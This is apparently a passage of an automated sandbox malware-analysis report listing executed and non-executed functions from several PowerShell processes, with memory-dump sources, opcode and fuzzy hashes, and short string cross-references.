Opcode ID: e38857bcc8239b7f48b29e76cff6c0a078b193738a47b8da94ace1d9ac8b15f1
Instruction ID: fd0da7f854f5c5346ee26d17819c191c6dfc581c43fa9953a0874a893577d65d
Opcode Fuzzy Hash: e38857bcc8239b7f48b29e76cff6c0a078b193738a47b8da94ace1d9ac8b15f1
Instruction Fuzzy Hash: F1F0BE31A0C5498FD758EA4CF0408A87BE0FF0832072100B6E009CB253DA29EC40CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F241D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1422169564.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 8914ea7476d05edd74c8f1d51f512ec05e6664e7cb276c50db029c3ca3f115cd
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 03E01A31B0C8088FEA69DA0CF0409A973E1FB9836171101B7D14EC7661CA22ECA1CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E5A2A9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1421636913.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecddb12ee3902dcfd9334b3cb1bb9e128e13a645bfb238e6f05c1f09be11d19
Instruction ID: a9fa1216a19858f96dcede3d5e34a246eb60eaa281a5414d71c36b898e5cad70
Opcode Fuzzy Hash: fecddb12ee3902dcfd9334b3cb1bb9e128e13a645bfb238e6f05c1f09be11d19
Instruction Fuzzy Hash: 14E04F75908A4C8F9F59EF18C85A9E97BE0FF68311B44029FE84DC7160DB719958CBC2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF886E5044D Relevance: 7.6, Strings: 6, Instructions: 92COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF886E504F1
/, xrefs: 00007FF886E50469
P/, xrefs: 00007FF886E504A1
8,, xrefs: 00007FF886E504B1
(0, xrefs: 00007FF886E504D1
p0, xrefs: 00007FF886E50491

Memory Dump Source

Source File: 00000005.00000002.1421636913.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID: (0$8,$P/$p0$-$/
API String ID: 0-2674306828
Opcode ID: 21168f0b171f716be54f7d946275f3cf66a35ae5f4b64ffcb9b20a8a8fb7642b
Instruction ID: bd482a898cfa284037bf7e8ed63b7d58c6e10cdd35c6d37982cd4ce8938ddb09
Opcode Fuzzy Hash: 21168f0b171f716be54f7d946275f3cf66a35ae5f4b64ffcb9b20a8a8fb7642b
Instruction Fuzzy Hash: 66316492D0E6C18FE3278A7878290796F61BF22654B2D00FBD08CDB1EBD855DD46C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E58BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

K_^F, xrefs: 00007FF886E58C7A
K_^J, xrefs: 00007FF886E58C8A
K_^7, xrefs: 00007FF886E58C12
K_^4, xrefs: 00007FF886E58BFA

Memory Dump Source

Source File: 00000005.00000002.1421636913.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID: K_^4$K_^7$K_^F$K_^J
API String ID: 0-377281160
Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
Instruction ID: 4e750727ac5a15e15676f5c27a928a2d710b80319068aced3947e9758c108f11
Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
Instruction Fuzzy Hash: 47212BF76185265ED7017FBDB8446D93BA0DFA92B434582B3D198CF053ED1870878AD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7876, Parent PID: 7468COMMON

Executed Functions

Function 00007FF886F266C2 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563997572.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97454b5faa3c98f62df4b58b81aa9ab77939cfa19b5eb23b9e8c7173304283c0
Instruction ID: 1e7766504dba819f3b2a0620f4372a0e07ab4f5363fd79ec693de066556db196
Opcode Fuzzy Hash: 97454b5faa3c98f62df4b58b81aa9ab77939cfa19b5eb23b9e8c7173304283c0
Instruction Fuzzy Hash: BCB12431E1EA8E4FE7A5AB6868559B97BD1FF0A391B1401BED40DCB283DE18EC05C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F266CA Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563997572.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be9f77a5a225b2729334a8d1862bfd98c8c337833c65aaaa4aec3e79e45dae1
Instruction ID: df70dec7f530c3adb66c6382e4a6134f09c115f12e51353b4bb9d73d78651f1a
Opcode Fuzzy Hash: 0be9f77a5a225b2729334a8d1862bfd98c8c337833c65aaaa4aec3e79e45dae1
Instruction Fuzzy Hash: 1C61DF21E0EACA4FE7A597686455AB87AD1BF06396B5800FEC44DCB6C3DD18EC05CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E597B0 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1e8b7c7dfd77788aea252674e425240d8f43f4928f09824f0a1c43b20736b8
Instruction ID: 6cac426cff390e597fdae11141c74fc022e0fa0628255ff86c3be4000f091815
Opcode Fuzzy Hash: 8f1e8b7c7dfd77788aea252674e425240d8f43f4928f09824f0a1c43b20736b8
Instruction Fuzzy Hash: CD31C57191CB489FDB189B5C980A6B97BE0FB99311F00426FE44DD3252DA70A856CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886D3EB89 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1562463087.00007FF886D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886d3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a5ad42c4658eadcde4a5a4b9bf60219fa28aa2403c3961bad5a7b43ee1147e
Instruction ID: 07e68bf99e14ca1f8932b061a7dfd68813f6558016cc4fa2fc1bee2dd96f5f18
Opcode Fuzzy Hash: a7a5ad42c4658eadcde4a5a4b9bf60219fa28aa2403c3961bad5a7b43ee1147e
Instruction Fuzzy Hash: EE41267180DBC54FE3578B28A8459623FB0FF56360B1505EFD089CB1E3E626AC46C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E5A769 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348a1e2fe50bb7f6e85c3e789a5422bbcf1c374b309796c7667d5a9f03a684ae
Instruction ID: 517a24ad5fe3e7cf504c992316409ff8e1bdebc282db6bfddd49379a7b2bc621
Opcode Fuzzy Hash: 348a1e2fe50bb7f6e85c3e789a5422bbcf1c374b309796c7667d5a9f03a684ae
Instruction Fuzzy Hash: A531D27190CA4C8FDB58DBAC9849BF97BE0EFA6321F04416FD04DC3152D664A85ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E5A0FB Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bfe1d811caa70c6ea54c511e03c3d8a6edac6e01c408eb197f6ba73623e6464
Instruction ID: 52db3234c2d6892d48f584082b63b4fd48b06d5a417a428810e33534ff6e36ed
Opcode Fuzzy Hash: 9bfe1d811caa70c6ea54c511e03c3d8a6edac6e01c408eb197f6ba73623e6464
Instruction Fuzzy Hash: 6E01F5F688DA894FDB52DF2CA8980D57FE0FF66210F1802ABD048C7162EA24484ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 8fed615b1388ffade34361fc6f194f5b0f8d7e22f9ece29554544b5277bb025b
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: EE01677111CB0C4FD744EF0CE455AA5B7E0FB95364F10056DE58AC3661DA36E882CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F2414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563997572.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71c138ae3f6e6c2f52c317999d667986943c8f8040713aed3e7befba68c4618
Instruction ID: 42f54a15a058cd5dbebbfeaa0da1ff01b720a94e8313368f2ad5be226b8f30d8
Opcode Fuzzy Hash: d71c138ae3f6e6c2f52c317999d667986943c8f8040713aed3e7befba68c4618
Instruction Fuzzy Hash: 63F0BE32A0C9098FE659EB5CF4004A877E0FF5836071100BAE01DC72A3DA29EC91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F24400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563997572.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7fb0ae454cbb7fe2b9934ff3549ecf19ed7f070ba1d30c29fe87c98bf106de1
Instruction ID: f4036f38e749ca3d8d969c32f53cda88144badbe7715c254f1086db9ef688bf0
Opcode Fuzzy Hash: f7fb0ae454cbb7fe2b9934ff3549ecf19ed7f070ba1d30c29fe87c98bf106de1
Instruction Fuzzy Hash: 40F0BE31A0C5498FD758EA5CF0404A87BE0FF0832071100B6E009CB153DA29EC40CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F241D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1563997572.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 8914ea7476d05edd74c8f1d51f512ec05e6664e7cb276c50db029c3ca3f115cd
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 03E01A31B0C8088FEA69DA0CF0409A973E1FB9836171101B7D14EC7661CA22ECA1CB80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF886E58BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

K_^J, xrefs: 00007FF886E58C62
K_^K, xrefs: 00007FF886E58C6A
K_^?, xrefs: 00007FF886E58C2A
K_^Q, xrefs: 00007FF886E58C8A
K_^8, xrefs: 00007FF886E58BF2
K_^Y, xrefs: 00007FF886E58CBA
K_^N, xrefs: 00007FF886E58C72
K_^<, xrefs: 00007FF886E58C12

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
API String ID: 0-2350917820
Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
Instruction ID: 4b8fdcca4f272e193c878f88883166328d4dd4432d4fc18f36421e8b46468e38
Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
Instruction Fuzzy Hash: 592108B3A185155ACB023BBDB8416D87791DF653B834542F3E028DF113DD18A4CB8A81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E589F2 Relevance: 6.4, Strings: 5, Instructions: 117COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FF886E58A12
K_^, xrefs: 00007FF886E589F2
K_^, xrefs: 00007FF886E58AC9
K_^, xrefs: 00007FF886E58A62
K_^, xrefs: 00007FF886E58A7A

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^$K_^
API String ID: 0-4077390204
Opcode ID: a6f77cc0f878d17707c1d167d5d81ae8058bc647d2a45189f66ebd146f800a80
Instruction ID: 2e6d06442982afdc0370e6457a4ae0169290485427b853875c2c28d6a5bf0b62
Opcode Fuzzy Hash: a6f77cc0f878d17707c1d167d5d81ae8058bc647d2a45189f66ebd146f800a80
Instruction Fuzzy Hash: 714183F2E0D6D34FE797962858691E67B90FF62398B1D01F6C0A8CF4D7ED186C028251

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E50625 Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

P/, xrefs: 00007FF886E50691
/, xrefs: 00007FF886E50661
8,, xrefs: 00007FF886E506A1
p0, xrefs: 00007FF886E50681

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID: 8,$P/$p0$/
API String ID: 0-2944847129
Opcode ID: d040a2b236334ed749d260c7071682def16ac0fc26a978b0122b659047528c3b
Instruction ID: 091757c4e971bae6e43daca4736dd2082d1445ff1112567c44514341f2993eac
Opcode Fuzzy Hash: d040a2b236334ed749d260c7071682def16ac0fc26a978b0122b659047528c3b
Instruction Fuzzy Hash: AF21D4D3C1DAC29FF21A89686C1D1B91B90FB91790F2800FBE04C9B5CBC8949D85C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E50633 Relevance: 5.1, Strings: 4, Instructions: 66COMMON

Download Yara Rule

Strings

P/, xrefs: 00007FF886E50691
/, xrefs: 00007FF886E50661
8,, xrefs: 00007FF886E506A1
p0, xrefs: 00007FF886E50681

Memory Dump Source

Source File: 00000008.00000002.1563256894.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID: 8,$P/$p0$/
API String ID: 0-2944847129
Opcode ID: 8bacf715211b505c5b0dcf2fe4a374d39af9fb0498c5f05954f713483a3068e8
Instruction ID: 2ca22eb10b7bb595ee0ad5a2cfd939d33849ddc60d86d256df57e0cc855235c2
Opcode Fuzzy Hash: 8bacf715211b505c5b0dcf2fe4a374d39af9fb0498c5f05954f713483a3068e8
Instruction Fuzzy Hash: 6911B6E3D1DAC19FF21A8A68681D2796B90FB91744B2840FBE04C975CFC894DD49C3A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7156, Parent PID: 7468COMMON

Executed Functions

Function 00007FF886F06605 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1765290024.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4837a50713a3ca05f8884bc2f72e5762103d6d365818727d9e7a519ce8b54a76
Instruction ID: c98b5780777595a0e0af98291766383a03f53f0261654e1d5457d0e4c01cc961
Opcode Fuzzy Hash: 4837a50713a3ca05f8884bc2f72e5762103d6d365818727d9e7a519ce8b54a76
Instruction Fuzzy Hash: EED10031E0DA8E4FE7A5DB6858159B97BE0FF563A4B1801BED44DCB093DA18EC05C342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E3A0D3 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764088868.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886e30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c15e2cb1f6bb5bbbb28d1d055aa2a6a92a6c6af598372fc88ee1b99856e76ce
Instruction ID: ddef24144ca8a3bb508d96509ff8c831228384faf6a264c2c61d47639a24a720
Opcode Fuzzy Hash: 6c15e2cb1f6bb5bbbb28d1d055aa2a6a92a6c6af598372fc88ee1b99856e76ce
Instruction Fuzzy Hash: 2D11367690E7CA4FD7539B389C290A47FB0EF63155B1902EBD088CB1A3D9195C49C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E39758 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764088868.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886e30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4165c4c653b9004e6ea46cf7f44e6f6d33f0be3ea259a88a0919407b35bcaf29
Instruction ID: 65f2b362cda9bc7923e5cd9bd172b080d4ffc2a8af8b307e4125a0c322580230
Opcode Fuzzy Hash: 4165c4c653b9004e6ea46cf7f44e6f6d33f0be3ea259a88a0919407b35bcaf29
Instruction Fuzzy Hash: 5431E67191CB498FDB18DF5CA8066B97BE1FBA8311F10412FE04993292DB34AC56CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886D1EE20 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1762930383.00007FF886D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886d1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae529eae585f216b82270f9ebf03f11fe083ad7c2cf50b5ad6a1bb4812d8934d
Instruction ID: d0739a575b0511ba4d6edb3e2af0387a04aa94b66745e0b21a9604a6225679a1
Opcode Fuzzy Hash: ae529eae585f216b82270f9ebf03f11fe083ad7c2cf50b5ad6a1bb4812d8934d
Instruction Fuzzy Hash: 8641E37080DBC44FE7568B39A845A527FF0FF52260B1505EFD089CB1A3D62AAC49C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E3A62C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764088868.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886e30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48986d224dc74f12bdb63e35ed4497b7359f89441d5042be1bff2b9980cb5216
Instruction ID: fb0e02cde4d59a4f65c2bf546c1d613d63d8dd87c5d7d8736b353f644fe91a4d
Opcode Fuzzy Hash: 48986d224dc74f12bdb63e35ed4497b7359f89441d5042be1bff2b9980cb5216
Instruction Fuzzy Hash: 4D21F83190CB4D4FEB59DBAC9C4A7E97FF0EB96321F04416BD048C3152DA74985ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764088868.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886e30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: f5d3e6d16dfc94a0c9f23397fb1d02d308ccab92e0d94519bae97981a5d63028
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 1701677111CB0D4FD744EF0CE455AA5B7E0FB95364F10056DE58AC3651DA36E882CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F0414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1765290024.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b78d122b58a3088a7801d7208c3106e1732889b0acf793e163880ae13be69c7
Instruction ID: d86b6f6137d4bedd8e77787019896dfa5834c962e5848d88cd57866edcf8437f
Opcode Fuzzy Hash: 6b78d122b58a3088a7801d7208c3106e1732889b0acf793e163880ae13be69c7
Instruction Fuzzy Hash: 17F0BE32A0C9098FD659EA4CE4004A877E0FF5836071100BAE01DC71A3DB29EC51C782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F04400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1765290024.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19e83dc6a6fa133bd42710bbb9218b41746a7127712eb8fa8a0552d5a4fd5cb
Instruction ID: f7bf1ef156b2e14b0703f27375115dfaec41b11e14a3fdaafa613e5a75856497
Opcode Fuzzy Hash: e19e83dc6a6fa133bd42710bbb9218b41746a7127712eb8fa8a0552d5a4fd5cb
Instruction Fuzzy Hash: 74F0B832A0C5498FEB98EA4CE4408A877E0FF08320B1100B6E009CB0A3DB2AEC40C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F041D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1765290024.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: a4bb2769373e227d52fe35647ae8b73cc680c4287deb4a89d67fd4af698c46a4
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 44E01A31B0C808DFDA69DA0CE0409A973E1FB9836175101BBD14EC7561CB22EC61CB81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF886E38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

M_^7, xrefs: 00007FF886E38C12
M_^J, xrefs: 00007FF886E38C8A
M_^4, xrefs: 00007FF886E38BFA
M_^F, xrefs: 00007FF886E38C7A

Memory Dump Source

Source File: 0000000D.00000002.1764088868.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff886e30000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^7$M_^F$M_^J
API String ID: 0-622050427
Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
Instruction ID: 0833b1b886018cb7684292974c34d9e45e51600971f486ee8b11a9ed64fb3cb2
Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
Instruction Fuzzy Hash: 882105B76185669ED3027FBDB804AE93740CFA52B478547B2E199CF093FD1870868AD2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7420, Parent PID: 7468COMMON

Executed Functions

Function 00007FF886F06605 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072649581.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76a3584846fa305e1bc23696fcc090658431be80203daeb111747a178222dd17
Instruction ID: 64ff0e3641a1055d477835f0e1538d8f699839ecc0e500722980463901f334e2
Opcode Fuzzy Hash: 76a3584846fa305e1bc23696fcc090658431be80203daeb111747a178222dd17
Instruction Fuzzy Hash: 43D10171E0DA8E4FE7A5DB685855AB97BE0FF563A0B1801BAD44DCB0D3DA18EC05C342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E39750 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2071004243.00007FF886E35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886e35000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cf183d0980f53fc21892b49f7b686025c0bd14b810048c69b7e6a33df368c2b
Instruction ID: 7048eed4fa93fc05221cee4eba4d1af78b6d87ceafbac0026b23d8deeb415dff
Opcode Fuzzy Hash: 2cf183d0980f53fc21892b49f7b686025c0bd14b810048c69b7e6a33df368c2b
Instruction Fuzzy Hash: 2741F83190CB894FE709DF5CAC0A6B97BF0FB55310F04416FD44993292DA64AC5ACBC6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886D1ED40 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2069281687.00007FF886D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886d1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc977312e5209febdd4d1af8fe71a9adc6c49407f452f4540b5bb2c3fbf2b117
Instruction ID: e0c8a43be936a1be4127269aae90fa477fe5c36d7018c31cd52b6b2b6812df96
Opcode Fuzzy Hash: cc977312e5209febdd4d1af8fe71a9adc6c49407f452f4540b5bb2c3fbf2b117
Instruction Fuzzy Hash: D041153040DBC44FE7569B28A841A527FF0FF93260B1906EFD089CB1A3D625AC46C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E3A49C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

